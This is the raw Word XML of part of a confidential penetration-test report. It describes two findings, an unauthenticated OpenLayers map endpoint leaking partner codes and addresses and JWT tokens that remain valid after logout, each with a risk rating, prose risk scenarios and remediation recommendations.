        <w:t xml:space="preserve">An endpoint serving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> map content was found to return sensitive application data — specifically partner codes and partner address information — without requiring authentication. This data was found embedded within the response of what appears to be a mapping data or configuration endpoint accessible under the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> integration path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Partner codes and address data are business-sensitive identifiers that should be accessible only to authenticated and authorised users. Exposing this data on an unauthenticated endpoint creates an information disclosure vulnerability that can be exploited for business intelligence gathering, social engineering, or targeted fraud. The endpoint appears to have been designed as a read-only mapping display component but inadvertently exposes backend data objects that carry sensitive business information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This type of vulnerability commonly arises when API endpoints that serve map feature data (such as WFS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> responses rendered in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) are not subject to the same authentication controls as the core application, or when access control is enforced at the application UI layer but not at the underlying data service layer.</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6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9900"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Severity: Medium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Impact: Medium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Likelihood: Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Affected Hosts / URLs</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OpenLayers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> map data endpoint exposing partner codes and addresses — specific URL to be documented]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="720" w:right="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot: Unauthenticated HTTP request to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint returning partner code and address data in response body]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack &amp; Risk Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The exposure of partner codes and address data on an unauthenticated endpoint presents the following risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Business Intelligence Harvesting: A competitor or malicious actor can systematically query the endpoint to enumerate all partner codes and addresses, building a database of the organisation's business relationships and physical locations without any prior access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Social Engineering &amp; Targeted Phishing: Partner identity information can be used to craft convincing phishing communications targeting partners or the organisation's staff, impersonating known partners using their real codes and addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Regulatory &amp; Privacy Compliance Exposure: Depending on the nature of the data and applicable regulations (e.g., PIPEDA in Canada, GDPR if EU data subjects are involved), exposure of business partner personally identifiable information (PII) such as addresses may constitute a reportable data breach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Facilitation of Fraud: Partner codes, if used as identifiers in business transactions or loyalty systems, could be leveraged by an attacker to impersonate partners or manipulate transaction logic if combined with other application access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply authentication and authorisation controls to all API and mapping data endpoints, ensuring that endpoints serving business data require a valid session token or API key before returning data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a server-side access control review for all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WFS/WMS endpoints and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> data sources to ensure that feature data containing sensitive attributes is restricted to authorised users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> map is intended to be publicly accessible (e.g., for display purposes), sanitise the feature data returned to remove sensitive business attributes (partner codes, addresses) from the public-facing data layer, serving only the spatial geometry needed for display.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Adopt a data classification policy that ensures sensitive attributes are tagged and audited within all data pipelines, preventing unintentional exposure through mapping or visualisation tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conduct a broader audit of all API endpoints, particularly those that serve structured data to front-end mapping libraries, to identify additional unauthenticated data exposure points.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required Fix Time Estimation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Planned — Medium priority</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-project-api-security/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.5  JWT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Token Remains Valid After User Logout (Missing Token Revocation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The application authenticates users with a username and password, upon which a JSON Web Token (JWT) is issued and used as a Bearer token in the Authorization header for all subsequent API requests. The token is configured with a 4-hour expiry window. Testing confirmed that after a user explicitly logs out of the application, the JWT remains valid and can be used to make authenticated API requests until its natural 4-hour expiry elapses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This behaviour is a known architectural characteristic of stateless JWT implementations. Because JWTs are self-contained and validated purely by their cryptographic signature and expiry claim, the server has no inherent mechanism to invalidate a specific token before its expiry without maintaining server-side state. However, the absence of any server-side token revocation mechanism — such as a token blacklist, short-lived tokens with refresh token rotation, or a session registry — means that a token intercepted or stolen during an active session remains usable for up to 4 hours even after the legitimate user has signed out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>It is important to note that a 4-hour JWT lifetime is relatively long compared to security best practices, which typically recommend access token lifetimes of 15 minutes to 1 hour for sensitive applications, compensated by refresh token mechanisms. The absence of token revocation on logout is the primary concern here, with the 4-hour window compounding the risk by maximising the usable window for a stolen token.</w:t>
      </w:r>
    </w:p>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6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rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity: Low</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Impact: Medium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B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Likelihood: Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B216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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Affected Hosts / URLs</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Application Authentication Endpoint (JWT issuance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B2166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21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All API endpoints accepting Authorization: Bearer &lt;token&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="720" w:right="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Screenshot: JWT token captured during authenticated session — same token used in API request after logout returns HTTP 200 with valid data response]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack &amp; Risk Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The absence of server-side JWT revocation creates the following risk scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Token Theft and Session Hijacking: If an attacker intercepts a JWT via network sniffing (on an insecure network), XSS exploitation (if applicable), or by obtaining access to a device/browser where the token was stored, the attacker can use the token to access the application's API for up to 4 hours after the victim has logged out — a period during which the victim would reasonably believe their session has been terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Shared or Compromised Device Risk: On shared workstations or devices where a user logs out expecting to terminate their session, a subsequent user with access to the browser's storage or network capture tools could replay the token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Incident Response Impairment: If an account compromise is detected and the user or administrator forces a logout, the attacker's stolen token continues to function for the remaining token lifetime, limiting the effectiveness of immediate remediation actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Elevated Risk in Sensitive Operations: Given that the application appears to manage loyalty and partner data (based on other findings), the 4-hour window of a valid post-logout token provides meaningful time for data exfiltration if a token is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>It should be noted that this issue is assessed as Low severity in this context due to the application's restricted access model (no public registration; only authorised accounts exist), which limits the pool of attackers who could obtain a valid token in the first place. The severity would be rated higher in a publicly accessible application with open registration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Implement a server-side token revocation mechanism. This can be achieved through a token blacklist (storing invalidated JTI claims in a fast in-memory store such as Redis until the token's natural expiry), which allows the application to reject specific tokens upon logout without abandoning the stateless JWT model entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Reduce the JWT access token lifetime to a shorter window (15 to 30 minutes is recommended for sensitive applications), and implement a refresh token mechanism with secure rotation to maintain usability without extending the attack window for stolen tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Ensure that the logout action on the server side records the token's JTI (JWT ID) claim in the revocation list and that all API endpoints validate against this list before accepting the token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Where technically feasible, implement token binding or user-agent fingerprinting to further limit the reusability of captured tokens across different client contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Review whether the application's JWT secret is appropriately protected, as a weak or exposed signing secret would allow an attacker to forge tokens entirely, a far more severe scenario than token replay.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Note on Default JWT Behaviour: The absence of token revocation on logout is not a bug in the JWT specification itself — it is the expected behaviour of a stateless JWT implementation. Many frameworks issue JWTs without built-in revocation by default. The responsibility to implement server-side revocation lies with the application developer and must be explicitly added. This finding reflects a design decision in the application rather than a framework defect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Required Fix Time Estimation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Planned — Standard remediation cycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-project-cheat-sheets/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://www.rfc-editor.org/rfc/rfc7519</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>— End of Report —</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This document is classified CONFIDENTIAL. Unauthorised distribution is prohibited.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B216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D247A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4932780C"/>
    <w:lvl w:ilvl="0" w:tplc="CA8A9764">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
